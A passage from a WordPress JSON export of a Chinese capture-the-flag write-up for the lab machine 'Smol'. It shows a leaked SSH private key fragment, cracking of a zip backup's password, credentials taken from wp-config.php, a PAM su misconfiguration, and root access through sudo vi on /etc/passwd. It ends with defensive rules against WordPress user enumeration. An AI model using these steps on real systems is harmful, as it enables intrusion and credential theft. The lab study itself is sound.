luGrKf72vDbajti9RwuO5wXhdi+RNhktuv6B4aGLTmDpNUk5UALknD2qAQAA\nAMBU+E8sqbf2oVmb6tyPu6Pw\/Srpk5caQw8Dn5RvG8VcdPsdCSc29Z+frcDkWN2OqL+b0B\nzbOhGp\/YwPhJi098nujXEpSied8JCKO0R9wU\/luWKeorvIQlpaKA5TDZaztrFqBkE8FFEQ\ngKLOtX3EX2P11ZB9UX\/nD9c30jEW7NrVcrC0qmts4HSpr1rggIm+JIom8xJQWuVK42Dmun\nlJqND0YfSgN5pqY4hNeqWIz2EnrFxfMaSzUFacK8WLQXVP2x8AAADBAPkcG1ZU4dRIwlXE\nXX060DsJ9omNYPHOXVlPmOov7Ull6TOdv1kaUuCszf2dhl1A\/BBkGPQDP5hKrOdrh8vcRR\nA+Eog\/y0lw6CDUDfwGQrqDKRxVVUcNbGNhjgnxRRg2ODEOK9G8GsJuRYihTZp0LniM2fHd\njAoSAEuXfS7+8zGZ9k9VDL8jaNNM+BX+DZPJs2FxO5MHu7SO\/yU9wKf\/zsuu5KlkYGFgLV\nIfa4X2anF1HTJJVfYWUBWAPPsKSfX1UQAAAMEAydo2UnBQhJUia3ux2LgTDe4FMldwZ+yy\nPiFf+EnK994HuAkW2l3R36PN+BoOua7g1g1GHveMfB\/nHh4zEB7rhYLFuDyZ\/\/8IzuTaTN\n7kGcF7yOYCd7oRmTQLUZeGz7WBr3ydmCPPLDJe7Tj94roX8tgwMO5WCuWHym6Os8z0NKKR\nu742mQ\/UfeT6NnCJWHTorNpJO1fOexq1kmFKCMncIINnk8ZF1BBRQZtfjMvJ44sj9Oi4aE\n81DXo7MfGm0bSFAAAAEnRoaW5rQHVidW50dXNlcnZlcg==\n-----END OPENSSH PRIVATE KEY-----\ndiego@smol:\/home\/think\/.ssh$ cat authorized_keys \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw\/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ\/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl\/wGAHYqhU3uTXVUbvj5yYUxsY\/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver\ndiego@smol:\/home\/think\/.ssh$ cat id_rsa.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw\/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ\/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl\/wGAHYqhU3uTXVUbvj5yYUxsY\/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver\ndiego@smol:\/home\/think\/.ssh$ cd ..\/..\/xavi\/\ndiego@smol:\/home\/xavi$ ls -la\ntotal 20\ndrwxr-x--- 2 xavi internal 4096 Aug 18  2023 .\ndrwxr-xr-x 6 root root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root root        9 Aug 18  2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 xavi xavi      220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 xavi xavi     3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 xavi xavi      807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root root        9 Aug 18  2023 .viminfo -> \/dev\/null<\/code><\/pre>\n
\u627e\u5230\u4e86\u4e00\u4e2a\u5907\u4efd\u4ee5\u53ca\u4e00\u4e2a\u53ef\u4f9bssh\u51ed\u8bc1\u767b\u5f55\u7684\u7528\u6237\uff0c\u5148\u767b\u5f55\u4e0a\u53bb\u518d\u8bf4\u5427\uff1a<\/p>\n
\"image-20250607145414287\"<\/div><\/p>\n
su\u914d\u7f6e\u6587\u4ef6\u65e0\u5bc6\u7801\u5207\u6362<\/h3>\n
\u4fe1\u606f\u641c\u96c6\u53d1\u73b0\uff1a<\/p>\n
think@smol:~$ ls -la\ntotal 32\ndrwxr-x--- 5 think internal 4096 Jan 12  2024 .\ndrwxr-xr-x 6 root  root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout\n-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc\ndrwx------ 2 think think    4096 Jan 12  2024 .cache\ndrwx------ 3 think think    4096 Aug 18  2023 .gnupg\n-rw-r--r-- 1 think think     807 Jun  2  2023 .profile\ndrwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> \/dev\/null\nthink@smol:~$ whoami;id\nthink\nuid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)\nthink@smol:~$ cat \/etc\/group | grep dev\nplugdev:x:46:\ndev:x:1004:think,gege\nthink@smol:~$ cd ..\/gege\nthink@smol:\/home\/gege$ ls -la\ntotal 31532\ndrwxr-x--- 2 gege internal     4096 Aug 18  2023 .\ndrwxr-xr-x 6 root root         4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> \/dev\/null\n-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip<\/code><\/pre>\n
think<\/code>\u548cgege<\/code>\u7528\u6237\u5c5e\u4e8e\u540c\u4e00\u4e2a\u7ec4\u6743\u9650\u8303\u56f4\u5185\uff0c\u8fd9\u91cc\u4f30\u8ba1\u5c31\u662f\u8981\u4ecethink<\/code>\u8df3\u5230gege<\/code>\u4e2d\u8fdb\u884c\u64cd\u4f5c\uff0c\u4f46\u662f\u6ca1\u5565\u5934\u7eea\uff0c\u4e0a\u4f20\u4e00\u4e2alinpeas.sh<\/code>\u8fdb\u884c\u626b\u63cf\u3002\u3002\u3002\u4f46\u662f\u6ca1\u53d1\u73b0\u5565\u5927\u9c7c\uff0c\u770b\u4e86\u4e00\u4e9b\u5e08\u5085\u7684wp\uff0c\u53d1\u73b0\u8fd9\u91cc\u53ef\u4ee5\u76f4\u63a5\u8fdb\u884c\u5207\u6362\uff0c\u770b\u6765\u662f\u4fee\u6539\u4e86\u914d\u7f6e\u6587\u4ef6\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
think@smol:\/tmp$ cat \/etc\/pam.d\/su | grep auth\nauth       sufficient pam_rootok.so\nauth  [success=ignore default=1] pam_succeed_if.so user = gege\nauth  sufficient                 pam_succeed_if.so use_uid user = think\n# auth       required   pam_wheel.so\n# auth       sufficient pam_wheel.so trust\n# auth       required   pam_wheel.so deny group=nosu\n# The standard Unix authentication modules, used with\n@include common-auth<\/code><\/pre>\n
\u8bf4\u660ethink<\/code>\u662f\u88ab\u4fe1\u4efb\u7684\u7528\u6237\uff0c\u5207\u6362\uff1a<\/p>\n
\"image-20250607151547211\"<\/div><\/p>\n
\u7834\u89e3\u5907\u4efd\u6587\u4ef6<\/h3>\n
\u628a\u6587\u4ef6\u4f20\u5230\u672c\u5730\u770b\u770b\u5907\u4efd\u4e86\u4e9b\u5565\uff0c\u4f46\u662f\u89e3\u538b\u7684\u65f6\u5019\u53d1\u73b0\u662f\u9700\u8981\u5bc6\u7801\u7684\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ zip2john wordpress.old.zip > ziphash\n-----------\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ sudo john --wordlist=\/usr\/share\/wordlists\/rockyou.txt ziphash\n[sudo] password for kali: \nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32\/64])\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nhero_gege@hotmail.com (wordpress.old.zip)     \n1g 0:00:00:01 DONE (2025-06-07 03:22) 0.5649g\/s 4306Kp\/s 4306Kc\/s 4306KC\/s hesse..hermosa_jessy\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n
\u77e5\u9053\u5bc6\u7801\u5373\u53ef\u8fdb\u884c\u89e3\u538b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ ll\ntotal 31544\n-rw-r--r-- 1 kali kali     4571 Jun  6 22:13 cms.log\n-rw-rw-r-- 1 kali kali      274 Jun  7 02:37 hash\n-rw------- 1 kali kali     2602 Jun  7 02:52 id_rsa\n-rw-r--r-- 1 kali kali      517 Jun  6 22:13 reports.json\ndrwxr-xr-x 4 kali kali     4096 Jun  6 22:06 Result\n-rw-rw-r-- 1 kali kali       50 Jun  7 01:17 revshell.sh\n-rw-rw-r-- 1 kali kali 32266546 Aug 16  2023 wordpress.old.zip\n-rw-rw-r-- 1 kali kali     1192 Jun  7 03:19 ziphash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ unzip wordpress.old.zip\nArchive:  wordpress.old.zip\n   creating: wordpress.old\/\n[wordpress.old.zip] wordpress.old\/wp-config.php password: \n  inflating: wordpress.old\/wp-config.php  \n  inflating: wordpress.old\/index.php  \n  inflating: wordpress.old\/wp-comments-post.php  \n  inflating: wordpress.old\/xmlrpc.php  \n  inflating: wordpress.old\/license.txt  \n  inflating: wordpress.old\/wp-login.php  \n   creating: wordpress.old\/wp-content\/\n extracting: wordpress.old\/wp-content\/index.php  \n   creating: wordpress.old\/wp-content\/plugins\/\n   ----------------\n  inflating: wordpress.old\/wp-admin\/export.php  \n  inflating: wordpress.old\/wp-admin\/options-writing.php  \n  inflating: wordpress.old\/wp-admin\/users.php  \n  inflating: wordpress.old\/wp-admin\/options-media.php  \n  inflating: wordpress.old\/wp-admin\/edit.php  \n  inflating: wordpress.old\/wp-admin\/import.php  \n  inflating: wordpress.old\/wp-admin\/revision.php<\/code><\/pre>\n
\u8fdb\u884c\u641c\u7d22\u53d1\u73b0\u6bd4\u8f83\u654f\u611f\u7684\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ cd wordpress.old \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol\/wordpress.old]\n\u2514\u2500$ ll\ntotal 228\n-rw-r--r--  1 kali kali   405 Aug 16  2023 index.php\n-rw-r--r--  1 kali kali 19915 Aug 16  2023 license.txt\n-rw-r--r--  1 kali kali  7399 Aug 16  2023 readme.html\n-rw-r--r--  1 kali kali  7211 Aug 16  2023 wp-activate.php\ndrwxr-xr-x  9 kali kali  4096 Aug 16  2023 wp-admin\n-rw-r--r--  1 kali kali   351 Aug 16  2023 wp-blog-header.php\n-rw-r--r--  1 kali kali  2323 Aug 16  2023 wp-comments-post.php\n-rw-r--r--  1 kali kali  2994 Aug 16  2023 wp-config.php\ndrwxr-xr-x  7 kali kali  4096 Aug 16  2023 wp-content\n-rw-r--r--  1 kali kali  5638 Aug 16  2023 wp-cron.php\ndrwxr-xr-x 27 kali kali 12288 Aug 16  2023 wp-includes\n-rw-r--r--  1 kali kali  2502 Aug 16  2023 wp-links-opml.php\n-rw-r--r--  1 kali kali  3927 Aug 16  2023 wp-load.php\n-rw-r--r--  1 kali kali 49441 Aug 16  2023 wp-login.php\n-rw-r--r--  1 kali kali  8537 Aug 16  2023 wp-mail.php\n-rw-r--r--  1 kali kali 25602 Aug 16  2023 wp-settings.php\n-rw-r--r--  1 kali kali 34385 Aug 16  2023 wp-signup.php\n-rw-r--r--  1 kali kali  4885 Aug 16  2023 wp-trackback.php\n-rw-r--r--  1 kali kali  3236 Aug 16  2023 xmlrpc.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol\/wordpress.old]\n\u2514\u2500$ cat wp-config.php \n<?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the installation.\n * You don't have to use the web site, you can copy this file to "wp-config.php"\n * and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * Database settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/editing-wp-config-php\/\n *\n * @package WordPress\n *\/\n\n\/\/ ** Database settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine( 'DB_NAME', 'wordpress' );\n\n\/** Database username *\/\ndefine( 'DB_USER', 'xavi' );\n\n\/** Database password *\/\ndefine( 'DB_PASSWORD', 'P@ssw0rdxavi@' );\n\n\/** Database hostname *\/\ndefine( 'DB_HOST', 'localhost' );\n\n\/** Database charset to use in creating database tables. *\/\ndefine( 'DB_CHARSET', 'utf8' );\n\n\/** The database collate type. Don't change this if in doubt. *\/\ndefine( 'DB_COLLATE', '' );\n\n\/**#@+\n * Authentication unique keys and salts.\n *\n * Change these to different unique phrases! You can generate these using\n * the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}.\n *\n * You can change these at any point in time to invalidate all existing cookies.\n * This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine( 'AUTH_KEY',         'put your unique phrase here' );\ndefine( 'SECURE_AUTH_KEY',  'put your unique phrase here' );\ndefine( 'LOGGED_IN_KEY',    'put your unique phrase here' );\ndefine( 'NONCE_KEY',        'put your unique phrase here' );\ndefine( 'AUTH_SALT',        'put your unique phrase here' );\ndefine( 'SECURE_AUTH_SALT', 'put your unique phrase here' );\ndefine( 'LOGGED_IN_SALT',   'put your unique phrase here' );\ndefine( 'NONCE_SALT',       'put your unique phrase here' );\n\n\/**#@-*\/\n\n\/**\n * WordPress database table prefix.\n *\n * You can have multiple installations in one database if you give each\n * a unique prefix. Only numbers, letters, and underscores please!\n *\/\n$table_prefix = 'wp_';\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\n * For information on other constants that can be used for debugging,\n * visit the documentation.\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/debugging-in-wordpress\/\n *\/\ndefine( 'WP_DEBUG', true );\n\n\/* Add any custom values between this line and the "stop editing" line. *\/\n\n\/* That's all, stop editing! Happy publishing. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( ! defined( 'ABSPATH' ) ) {\n        define( 'ABSPATH', __DIR__ . '\/' );\n}\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once ABSPATH . 'wp-settings.php';<\/code><\/pre>\n
\u5f97\u5230\u65b0\u7684\u51ed\u8bc1\uff1a<\/p>\n
xavi\nP@ssw0rdxavi@<\/code><\/pre>\n
\u8fdb\u884c\u5207\u6362\uff1a<\/p>\n
\"image-20250607152548920\"<\/div><\/p>\n
\u7f16\u8f91\/etc\/passwd\u83b7\u53d6rootshell<\/h3>\n
xavi@smol:~$ sudo -l\n[sudo] password for xavi: \nMatching Defaults entries for xavi on smol:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser xavi may run the following commands on smol:\n    (ALL : ALL) \/usr\/bin\/vi \/etc\/passwd<\/code><\/pre>\n
\u53d1\u73b0\u53ef\u4ee5\u7f16\u8f91\/etc\/passwd<\/code>\u6587\u4ef6\uff0c\u6dfb\u52a0\u51ed\u8bc1\u8fdb\u884c\u6dfb\u52a0\u9ad8\u6743\u9650\u7528\u6237\uff0c\u6216\u662f\u76f4\u63a5\u4f7f\u7528vi<\/code>\u7684\u547d\u4ee4\u6a21\u5f0f\u83b7\u53d6shell\u7686\u53ef\uff1a<\/p>\n
vi\u7684\u547d\u4ee4\u6a21\u5f0f<\/h4>\n
\"image-20250607152846462\"<\/div>
\n
\"image-20250607152902834\"<\/div><\/p>\n
\u6dfb\u52a0\u9ad8\u6743\u9650\u7528\u6237<\/h4>\n
\u6dfb\u52a0\u4e00\u4e2aroot<\/code>\u6743\u9650\u7684\u7528\u6237\u4e5f\u5f88\u597d\uff0c\u611f\u89c9\u8fd9\u662f\u4f5c\u8005\u60f3\u8003\u7684\uff0c\u6216\u662f\u628aroot\u5bc6\u7801\u7f6e\u7a7aroot::0:0:root:\/root:\/usr\/bin\/bash<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol\/wordpress.old]\n\u2514\u2500$ openssl passwd -1 -salt kali kali  \n$1$kali$\/rLA3oVIdYGokOY9m1jKj.<\/code><\/pre>\n
\"image-20250607153442406\"<\/div><\/p>\n
root@smol:\/home\/xavi$ cd ~\nroot@smol:~$ ls -la\ntotal 64K\ndrwx------  7 root root 4.0K Jun  7 07:34 .\ndrwxr-xr-x 18 root root 4.0K Mar 29  2024 ..\nlrwxrwxrwx  1 root root    9 Jun  2  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root 3.2K Jun 21  2023 .bashrc\ndrwx------  2 root root 4.0K Jun  2  2023 .cache\n-rw-------  1 root root   35 Mar 29  2024 .lesshst\ndrwxr-xr-x  3 root root 4.0K Jun 21  2023 .local\nlrwxrwxrwx  1 root root    9 Aug 18  2023 .mysql_history -> \/dev\/null\ndrwxr-xr-x  4 root root 4.0K Aug 16  2023 .phpbrew\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-r-----  1 root root   33 Aug 16  2023 root.txt\n-rw-r--r--  1 root root   75 Aug 17  2023 .selected_editor\ndrwx------  3 root root 4.0K Jun 21  2023 snap\ndrwx------  2 root root 4.0K Jun  2  2023 .ssh\n-rw-rw-rw-  1 root root  13K Jun  7 07:34 .viminfo\nroot@smol:~$ cat root.txt \nbf89ea3ea01992353aef1f576214d4e4<\/code><\/pre>\n
\u5176\u4ed6\u5c1d\u8bd5<\/h2>\n
\u7a81\u7136\u60f3\u8d77\u6765\u7fa4\u4e3b\u4e4b\u524d\u63d0\u5230\u8fc7wordpress<\/code>\u6709\u4e00\u5904\u4fe1\u606f\u6cc4\u9732\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s http:\/\/www.smol.hmv\/index.php\/wp-json\/WP\/V2\/users\/1 | jq\n{\n  "id": 1,\n  "name": "admin",\n  "url": "http:\/\/www.smol.hmv",\n  "description": "",\n  "link": "http:\/\/www.smol.hmv\/index.php\/author\/admin\/",\n  "slug": "admin",\n  "avatar_urls": {\n    "24": "https:\/\/secure.gravatar.com\/avatar\/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=24&d=monsterid&r=g",\n    "48": "https:\/\/secure.gravatar.com\/avatar\/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=48&d=monsterid&r=g",\n    "96": "https:\/\/secure.gravatar.com\/avatar\/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=96&d=monsterid&r=g"\n  },\n  "meta": [],\n  "_links": {\n    "self": [\n      {\n        "href": "http:\/\/www.smol.hmv\/index.php\/wp-json\/wp\/v2\/users\/1",\n        "targetHints": {\n          "allow": [\n            "GET"\n          ]\n        }\n      }\n    ],\n    "collection": [\n      {\n        "href": "http:\/\/www.smol.hmv\/index.php\/wp-json\/wp\/v2\/users"\n      }\n    ]\n  }\n}<\/code><\/pre>\n
\u9700\u8981\u914d\u7f6e\u9632\u706b\u5899\u7528\u6765\u9632\u6b62\u76f8\u5173\u6cc4\u9732\u3002\u3002\u3002\u3002<\/p>\n
\n
\u53c2\u8003\uff1ahttps:\/\/www.wpcom.cn\/tutorial\/301.html<\/a><\/p>\n<\/blockquote>\n
server {\n    location ~ ^\/wp-json\/wp\/v2\/users(\/.*)?$ {\n        deny all;\n        return 403;\n    }\n}<\/code><\/pre>\n
\/**\n * \u7981\u7528 WordPress \u7528\u6237\u679a\u4e3e\u63a5\u53e3\uff0c\u53ea\u6709\u5177\u6709\u7f16\u8f91\u6743\u9650\uff08editor\uff09\u53ca\u4ee5\u4e0a\u6743\u9650\u7684\u7528\u6237\u624d\u53ef\u8bbf\u95ee\u3002\n * \n * @author WPCOM\n * @version 1.0.0\n * @since 2024-12-26\n *\/\nadd_filter('rest_endpoints', function ($endpoints) {\n    global $has_users_endpoint;\n    if($has_users_endpoint) return $endpoints;\n\n    if(isset($endpoints['\/wp\/v2\/users'])){\n        $users_endpoint = $endpoints['\/wp\/v2\/users'];\n        unset($endpoints['\/wp\/v2\/users']);\n    }\n\n    \/\/ \u7f16\u8f91\u53ca\u4ee5\u4e0a\u6743\u9650\u53ef\u5c55\u793a\u7528\u6237\u5217\u8868\n    if (defined('REST_REQUEST') && REST_REQUEST && current_user_can('editor')) {\n        \/\/ \u6062\u590d \/wp\/v2\/users \u7aef\u70b9\n        if(isset($users_endpoint)) $endpoints['\/wp\/v2\/users'] = $users_endpoint;\n        $has_users_endpoint = true;\n    }\n\n    return $endpoints;\n});\n# functions.php<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Smol \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol] \u2514\u2500$ rustsca […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-835","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/835","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=835"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/835\/revisions"}],"predecessor-version":[{"id":836,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/835\/revisions\/836"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=835"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=835"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=835"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}